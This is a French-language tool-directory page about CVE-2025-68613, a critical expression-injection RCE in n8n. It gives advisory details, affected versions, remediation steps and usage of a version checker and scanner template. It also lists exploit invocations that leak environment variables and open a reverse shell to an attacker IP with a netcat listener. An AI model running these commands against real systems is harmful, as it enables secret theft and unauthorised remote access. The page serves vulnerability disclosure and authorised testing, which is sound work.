Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-68613 — CVE-2025-68613 | Kitploit
Outils/GitHubGitHub/sahilccras/blackash-cve-2025-68613
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

Voir le dépôt
1il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2025-68613 — RCE critique dans n8n

n8nblog

Sévérité : 🔴 Critique Impact : Exécution de code à distance Plateforme concernée : n8n (automatisation de workflows)


🧩 Aperçu

CVE-2025-68613 est une vulnérabilité de sécurité critique dans n8n, une plateforme open-source d'automatisation de workflows. Le problème permet à un attaquant authentifié d'exécuter du code arbitraire sur le serveur en abusant de l'évaluation des expressions de workflow.


🎯 Détails de la vulnérabilité

  • Type : Injection d'expression → Exécution de code à distance
  • CWE : CWE-913 — Contrôle inapproprié des ressources de code gérées dynamiquement
  • Vecteur d'attaque : Réseau
  • Privilèges requis : Faible (utilisateur authentifié)
  • Interaction utilisateur : Aucune
  • Portée : Modifiée

💥 Pourquoi c'est dangereux : Les expressions malveillantes sont évaluées dans un contexte qui n'est pas correctement isolé (sandbox), permettant l'accès au runtime sous-jacent.


🧨 Impact potentiel

G8vg8GbXkAAJan2

En cas d'exploitation, un attaquant pourrait :

  • 🖥️ Exécuter des commandes système arbitraires
  • 🔐 Voler des identifiants, jetons et secrets
  • 🧬 Modifier ou backdoorer des workflows
  • 📤 Exfiltrer des données sensibles
  • 💣 Compromettre complètement l'hôte n8n

L'attaque s'exécute avec les mêmes privilèges que le service n8n, amplifiant son impact.


📊 Métriques de sévérité

MétriqueValeur
CVSS v3.1~9.9–10.0
ConfidentialitéÉlevée
IntégritéÉlevée
Disponibilité

➡️ L'authentification est requise, mais aucun accès administrateur n'est nécessaire.


🧪 Versions concernées

🚫 Vulnérables :

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ Corrigées :

  • 1.120.4
  • 1.121.1
  • 1.122.0 et plus récentes

🛠️ Remédiation et Atténuation

✅ Recommandé (Meilleure option)

  • Mettez à jour immédiatement vers une version corrigée

⚠️ Réduction temporaire des risques

(Ne supprime PAS complètement la vulnérabilité)

  • Restreindre la création/édition de workflows aux utilisateurs de confiance uniquement
  • Exécuter n8n avec des privilèges OS minimaux
  • Isoler le service (conteneurs, VM, système de fichiers restreint)
  • Limiter l'exposition réseau (VPN, règles de pare-feu)
  • Activer la journalisation et surveiller les modifications de workflows

🧠 Référence rapide



✅ CVE-2025-68613.py — Vérificateur distant de version et d'exposition (Sûr)

🧪 Exemple d'utilisation

root@kitploit:~
sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

Example Output

root@kitploit:~
[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Comment exécuter ce script ?

  1. Téléchargez et installez Nuclei.
  2. Clonez ce dépôt sur votre système local.
  3. Exécutez la commande suivante :
root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

Ou si vous souhaitez analyser une liste d'hôtes, exécutez :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

Exemple de sortie

nuclei

Exemples d'utilisation :

  • Fuite de variables d'environnement :
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • Obtenir les infos utilisateur :
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • Shell inversé (démarrez d'abord l'écouteur : nc -lvnp 4444) :
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

Ce script est destiné uniquement aux tests de sécurité autorisés sur les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.


⚠️ AVERTISSEMENT ⚠️

🔒 Ce script est une preuve de concept (PoC) pour CVE-2025-68613 dans n8n.

📚 Il est fourni strictement à des fins éducatives et uniquement pour des tests de sécurité autorisés.

🛡️ Utilisez-le exclusivement sur les systèmes que vous possédez, contrôlez ou pour lesquels vous avez une autorisation écrite explicite de tester.

🚫 Toute utilisation non autorisée contre un système est illégale et peut violer les lois (ex. : lois sur la fraude et les abus informatiques).

❌ L'auteur et toute partie associée déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques.

✅ Utilisez-le de manière responsable, éthique et en totale conformité avec toutes les lois et réglementations applicables.

🔐 Si vous effectuez des tests d'intrusion, assurez-vous qu'une autorisation appropriée (par exemple, des règles d'engagement) est en place.

🛠️ Les chercheurs en sécurité peuvent utiliser ceci pour vérifier les vulnérabilités et encourager une correction rapide.


Télécharger l’outil
Élevée
CatégorieInfo
CVE IDCVE-2025-68613
Produitn8n
Classe de bogueInjection d'expression
RésultatExécution de code à distance
Accès requisUtilisateur authentifié
Correctif disponibleOui